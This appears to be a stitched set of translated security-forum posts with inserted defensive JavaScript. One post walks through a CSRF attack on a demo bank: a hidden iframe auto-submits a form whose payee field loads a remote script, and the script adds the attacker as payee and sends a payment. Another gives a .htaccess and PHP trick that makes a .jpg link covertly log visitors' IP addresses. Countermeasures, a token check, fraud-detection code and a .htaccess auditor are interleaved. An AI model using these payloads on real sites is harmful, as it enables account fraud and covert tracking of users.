During a valid session at False Secure Bank, the user then visits http://127.0.0.1/CSRF_Example (the attacker's site).
On the attacker's site we added an iFrame with dimensions 0X0, making the iFrame's content invisible to the end user.
In the iFrame we placed HTML code including a form with pre-populated values, and scripts that automatically submit the form on the user's behalf:
    <form name="input" action="http://localhost:3000/send_payment" method="post">
    <input type="text" name="pay[payee]" value="<script src="http://127.0.0.1/CSRF_Example/bankattack.js" type="text/javascript"></script>">
    <input type="text" name="amount" value="0"/>
    <input type="text" name="commit" value="Pay"/>
    </form>
    <script>document.input.submit();</script>
Note that the pay[payee] field is in fact the code for the Cross Site Scripting payload. It corresponds to the XSS vulnerability discovered earlier in the False Secure Bank site. In this case, the script points to the source located at http://127.0.0.1/CSRF_Example/bankattack.js. The document.input.submit() command automatically sends the request on the user's behalf; in other words, we deliver a Cross Site Scripting (XSS) payload via a Cross Site Request Forgery (CSRF) attack.
The user's browser automatically sends the request to http://localhost:3000/send_payment with the user's cookies. The user does not even suspect what has happened.
False Secure Bank sends a response to the 0 X 0 iFrame from which the request originated. The programmer includes an unfiltered, unencoded version of the pay[payee] parameter from the send_payment request. Because this parameter runs in the client's browser, the tag <script src='http://127.0.0.1/CSRF_Example/bankattack.js' type='text/javascript'></script> executes automatically.
The browser automatically downloads the bankattack.js file. Because the request for the JavaScript file appears to come from False Secure Bank, the browser will not consider this a violation of the same-origin policy.
In the JavaScript file we included whole series of Ajax requests and responses.
They look something like this:
    xmlhttp.open("GET", "/payment", false); // AJAX request calling the payment screen
    xmlhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    xmlhttp.send("");
The type of the JavaScript "XML HTTP" object differs depending on the browser. We can set the request headers however we like and can emulate any user-generated content, including changing the user-agent tag or any cookies used to track the user's browsing. We can save the response returned by the "send" command and pull out the values that interest us. Suppose we need to find out the victim's account number in order to transfer some funds. We can send an XML HTTP request to the home page and pull the account number out of the HTML response. Similarly, we can pull out any anti-CSRF tokens once we have managed to run the malicious JavaScript code.
False Secure Bank neither supports nor contains Ajax code. That does not matter to us. All we need is for the user's browser to support Ajax, and modern browsers do.
The JavaScript code from the previous step makes several different requests:
Goes to the payments screen
Removes the attacker's account number
Adds the attacker as a payee
Initiates the payment
Confirms the payment
While this scenario shows a bank transfer, we could automate practically any series of requests, in any web application, with this type of attack.
Countermeasures (Developers)
The easiest countermeasure is to prevent Cross Site Scripting, by making judicious use of strong encoding libraries such as those provided in the OWASP ESAPI project. Follow the details outlined in the Cross Site Scripting Prevention Cheat Sheet.
Use proper frame code (Frame Busting: a practical method that ensures through HTML code that the site will not be displayed inside a frame). There are many ways to do this.
Keep in mind that the attacker needs a frame; thus he will be forced to carry out the entire attack in view of the user, which increases the chance that the user closes the browser and stops the attack in progress.
The most effective method of preventing this attack, and almost all attacks against sensitive transactions, is the use of transactional authentication. Developers can require Phone Factor authentication, for example, for all transfers exceeding e.g. 100 USD. Of course, any additional authentication can make the operation harder to use and so make the application more cumbersome.
Less effective, and certainly debatable, is to use the less user-friendly approach of CAPTCHA anti-automation technology.
The original XSS vector was delivered by means of a CSRF attack and by means of the send_payment transaction. If the entire authenticated portion of False Secure Bank had been protected against CSRF, we would not have been able to load the reflected XSS code in the first place. Stored XSS does not have the same limitation.
Countermeasures (End users)
Always end any password-protected session by logging out. This does not prevent the attack completely, but it significantly limits exposure to an attack.
Do not browse other sites while running sensitive applications such as online banking.
Use the NoScript browser plugin. Yes, NoScript prevents this attack even if you trust the script on the trap site, because NoScript accurately identifies the CSRF requests as potential Cross Site Scripting attacks.
I hope that developers who create their own applications take care over their security and that they no longer categorically believe that XSS (Cross Site Scripting) is something of low or medium risk.
LE: Thank you very much, everyone, for all the likes given to the threads I have written. It is a small satisfaction, which shows me that I did not write to add to the quantity but for people, and that they appreciated the value of the information.
PS: By the way, how many of you use NoScript?
    1 point
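The developer countermeasures listed in the post above (encode the reflected pay[payee] value, protect the authenticated send_payment request against CSRF, refuse to be framed), as an added example that is not part of the original post or of the False Secure Bank demo. The function names, the csrf_token field and the response shape are assumptions made for the illustration; only Node's built-in crypto module is used.

```javascript
// Added example: a hardened send_payment handler. Names are hypothetical,
// not taken from the demo application described in the post.
const crypto = require('crypto');

// Constructed key for the example; a deployment would load it from configuration.
const SERVER_SECRET = crypto.randomBytes(32);

// HTML-encode a value before it is written into element content or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Per-session anti-CSRF token: HMAC of the session id under a server-side key.
function issueCsrfToken(sessionId, secret = SERVER_SECRET) {
  return crypto.createHmac('sha256', secret).update(sessionId).digest('hex');
}

function verifyCsrfToken(sessionId, token, secret = SERVER_SECRET) {
  if (typeof token !== 'string') return false;
  const expected = Buffer.from(issueCsrfToken(sessionId, secret), 'utf8');
  const supplied = Buffer.from(token, 'utf8');
  // timingSafeEqual throws on unequal lengths, so the lengths are compared first.
  return supplied.length === expected.length && crypto.timingSafeEqual(supplied, expected);
}

// Sent on every response so the page cannot be rendered inside a hidden frame.
const RESPONSE_HEADERS = {
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "frame-ancestors 'none'",
  'Content-Type': 'text/html; charset=utf-8',
};

// request = { sessionId, body } where body holds the posted form fields.
function handleSendPayment(request) {
  const { sessionId, body } = request;

  // A cross-site form post carries the victim's cookies but not this token.
  if (!verifyCsrfToken(sessionId, body.csrf_token)) {
    return { status: 403, headers: RESPONSE_HEADERS, body: '<p>Request rejected.</p>' };
  }

  const amount = Number(body.amount);
  if (!Number.isFinite(amount) || amount <= 0) {
    return { status: 400, headers: RESPONSE_HEADERS, body: '<p>Invalid amount.</p>' };
  }

  // The payee is echoed back only after encoding, so markup in it stays inert text.
  const payee = escapeHtml(body['pay[payee]']);
  return {
    status: 200,
    headers: RESPONSE_HEADERS,
    body: `<p>Payment of ${amount.toFixed(2)} to ${payee} queued.</p>`,
  };
}
```

The token check and the encoding are both needed: as the post notes, script that already runs in the bank's origin can read any anti-CSRF token from the page.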
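The two behavioural signals the post above names (an abnormally fast series of requests, and several payers sending money to the same person within a short interval) can be checked over logs as follows. This is an added example, not part of the original post; the record fields, thresholds and sample data are constructed for the illustration.

```javascript
// Added example: behavioural checks over payment logs. All records are constructed.
const MINUTE = 60 * 1000;

const SAMPLE_TRANSFERS = [
  { ts: 0 * MINUTE, payer: 'acct-1001', payee: 'acct-9000', amount: 250 },
  { ts: 1 * MINUTE, payer: 'acct-1002', payee: 'acct-9000', amount: 300 },
  { ts: 2 * MINUTE, payer: 'acct-1003', payee: 'acct-9000', amount: 120 },
  { ts: 3 * MINUTE, payer: 'acct-1004', payee: 'acct-5000', amount: 40 },
  { ts: 90 * MINUTE, payer: 'acct-1004', payee: 'acct-5000', amount: 40 },
  { ts: 200 * MINUTE, payer: 'acct-1005', payee: 'acct-5000', amount: 75 },
];

const SAMPLE_REQUESTS = [
  // sess-a: the payment flow completes in under half a second
  { ts: 1000, session: 'sess-a', path: '/payment' },
  { ts: 1100, session: 'sess-a', path: '/payment' },
  { ts: 1250, session: 'sess-a', path: '/send_payment' },
  { ts: 1400, session: 'sess-a', path: '/send_payment' },
  // sess-b: the same flow at human pace
  { ts: 5000, session: 'sess-b', path: '/payment' },
  { ts: 20000, session: 'sess-b', path: '/payment' },
  { ts: 41000, session: 'sess-b', path: '/send_payment' },
  { ts: 65000, session: 'sess-b', path: '/send_payment' },
];

// Payees that received money from at least minPayers distinct payers
// inside any sliding window of windowMs.
function findPayeeFanIn(transfers, windowMs, minPayers) {
  const byPayee = new Map();
  for (const t of transfers) {
    if (!byPayee.has(t.payee)) byPayee.set(t.payee, []);
    byPayee.get(t.payee).push(t);
  }
  const flagged = [];
  for (const [payee, list] of byPayee) {
    list.sort((a, b) => a.ts - b.ts);
    const inWindow = new Map(); // payer -> transfers currently inside the window
    let start = 0;
    for (let end = 0; end < list.length; end++) {
      inWindow.set(list[end].payer, (inWindow.get(list[end].payer) || 0) + 1);
      // Drop transfers that have fallen out of the window.
      while (list[end].ts - list[start].ts > windowMs) {
        const left = inWindow.get(list[start].payer) - 1;
        if (left === 0) inWindow.delete(list[start].payer);
        else inWindow.set(list[start].payer, left);
        start++;
      }
      if (inWindow.size >= minPayers) {
        flagged.push({ payee, payers: [...inWindow.keys()].sort() });
        break;
      }
    }
  }
  return flagged;
}

// Sessions that issued at least minRequests requests within maxSpanMs.
function findRequestBursts(requests, minRequests, maxSpanMs) {
  const bySession = new Map();
  for (const r of requests) {
    if (!bySession.has(r.session)) bySession.set(r.session, []);
    bySession.get(r.session).push(r.ts);
  }
  const flagged = [];
  for (const [session, times] of bySession) {
    times.sort((a, b) => a - b);
    for (let i = 0; i + minRequests - 1 < times.length; i++) {
      if (times[i + minRequests - 1] - times[i] <= maxSpanMs) {
        flagged.push(session);
        break;
      }
    }
  }
  return flagged.sort();
}
```

Neither signal proves fraud on its own; both mark transactions for review that the transaction log alone records as consented.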
  10. The XSS and SQLi hunters on the forum should take note. By @TheTime's estimate you have 3-6 years to learn far more than the potential rival candidates for the positions that are going to open up. You will also have a big advantage over those who took a security course at university and want to get into the field. So work hard and go easier on the slacking.
    1 point
  11. There are already plenty of people who know their way around computers to some degree and know how to guard against those with bad intentions. For example, I do not open dubious links until I have done a view-source:LINK and checked for iframe, javascript, vbscript, etc. (do not start with nonsense about how this implies I know my way around computers)
Step 1
Create a .htaccess file with the following content.
    AddType application/x-httpd-php .jpg
Step 2
Create a .jpg file with the following code.
    <?php
    // record the visitor's address
    $ip=$_SERVER['REMOTE_ADDR'];
    $x1=fopen("ip.txt","a");
    fwrite($x1,$ip."\r");
    fclose($x1);
    // answer as an image so the link looks like an ordinary picture
    header('Content-Type: image/jpeg');
    header ("Cache-Control: no-cache, must-revalidate");
    echo file_get_contents('avatar.png');
    ?>
Where you capture the IP you can also extract information such as the browser, the operating system or others.
Who checks a link to an image? Well, there are some who know that you can create a directory with .jpg in its name, and they will not click or will check the source, and in this one there is nothing suspicious.
I know that some will turn up their noses, but it can surely be of help. I also know that you can extract the IP from the logs, yes, but it is easier not to have to search.
    1 point
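Seen from the side of whoever administers the web server, the mapping in Step 1 of the post above is what makes an image URL execute code, and it is straightforward to audit for. The following added example (not part of the original post) scans the text of a .htaccess file for AddType or AddHandler directives that hand image extensions to a PHP handler; the function name, the extension list and the sample file are constructed for the illustration.

```javascript
// Added example: audit .htaccess content for image extensions mapped to PHP.
// The sample file below is constructed.
const SAMPLE_HTACCESS = [
  '# constructed sample',
  'Options -Indexes',
  'AddType application/x-httpd-php .jpg',
  'AddType image/jpeg .jpg .jpeg',
  '# AddHandler application/x-httpd-php .png',
  'AddHandler application/x-httpd-php .PNG gif',
  'AddType application/x-httpd-php .php',
].join('\n');

// Extensions that should only ever be served as static files (assumed list).
const IMAGE_EXTENSIONS = new Set(['jpg', 'jpeg', 'png', 'gif', 'bmp', 'ico', 'webp', 'svg']);

// Returns one finding per directive: { line, directive, extensions }.
function findExecutableImageMappings(htaccessText) {
  const findings = [];
  htaccessText.split(/\r?\n/).forEach((raw, index) => {
    const line = raw.trim();
    if (line === '' || line.startsWith('#')) return; // blank line or comment

    const tokens = line.split(/\s+/);
    const directive = tokens[0].toLowerCase();
    if (directive !== 'addtype' && directive !== 'addhandler') return;

    // Second token is the media type or handler name, possibly quoted.
    const target = (tokens[1] || '').replace(/^"|"$/g, '');
    if (!/php/i.test(target)) return;

    // Apache accepts extensions with or without the leading dot, in any case.
    const extensions = tokens
      .slice(2)
      .map((t) => t.replace(/^\./, '').toLowerCase())
      .filter((ext) => IMAGE_EXTENSIONS.has(ext));

    if (extensions.length > 0) {
      findings.push({ line: index + 1, directive: tokens[0], extensions });
    }
  });
  return findings;
}
```

A finding on a directory that accepts uploads or serves avatars deserves attention, since the same mapping lets any file with that extension run as PHP.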